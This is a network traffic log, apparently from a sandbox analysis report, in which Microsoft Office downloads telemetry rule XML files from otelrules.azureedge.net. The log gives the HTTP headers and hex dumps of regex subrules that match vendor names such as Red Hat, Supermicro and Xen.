                                                                                                                                      2024-11-29 22:11:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      94192.168.2.44984813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:32 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 432
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                      x-ms-request-id: 9a67ffab-601e-00ab-7222-4166f4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221132Z-174f7845968n2hr8hC1EWR9cag0000001060000000008y4y
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      95192.168.2.44984713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:32 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:32 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                      x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221132Z-174f7845968cpnpfhC1EWR3afc000000105000000000a3nz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      96192.168.2.44984913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:33 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:33 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                      x-ms-request-id: 438404c1-e01e-0020-72a2-42de90000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221133Z-174f7845968cdxdrhC1EWRg0en00000010cg00000000mzvk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      97192.168.2.44985013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:33 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                      x-ms-request-id: 4fa988ca-e01e-000c-2c91-3f8e36000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f78459685m244hC1EWRgp2c000000108g00000000mga9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      98192.168.2.44985113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:33 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                      x-ms-request-id: 56901f94-d01e-002b-530d-4125fb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968pght8hC1EWRyvxg00000003t0000000000w2d
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      99192.168.2.44985213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:34 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                      x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968kdththC1EWRzvxn0000000czg000000001q4n
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      100192.168.2.44985313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:34 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                      x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gcha
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      101192.168.2.44985413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:35 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 405
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                      x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968nxc96hC1EWRspw8000000109000000000a361
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:36 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      102192.168.2.44985513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:35 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                      x-ms-request-id: 46d93ec3-201e-005d-5b34-41afb3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968j6t2phC1EWRcfe800000010k000000000phxr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      103192.168.2.44985613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:36 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 174
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                      x-ms-request-id: 41c1b425-301e-005d-48df-41e448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gcnk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
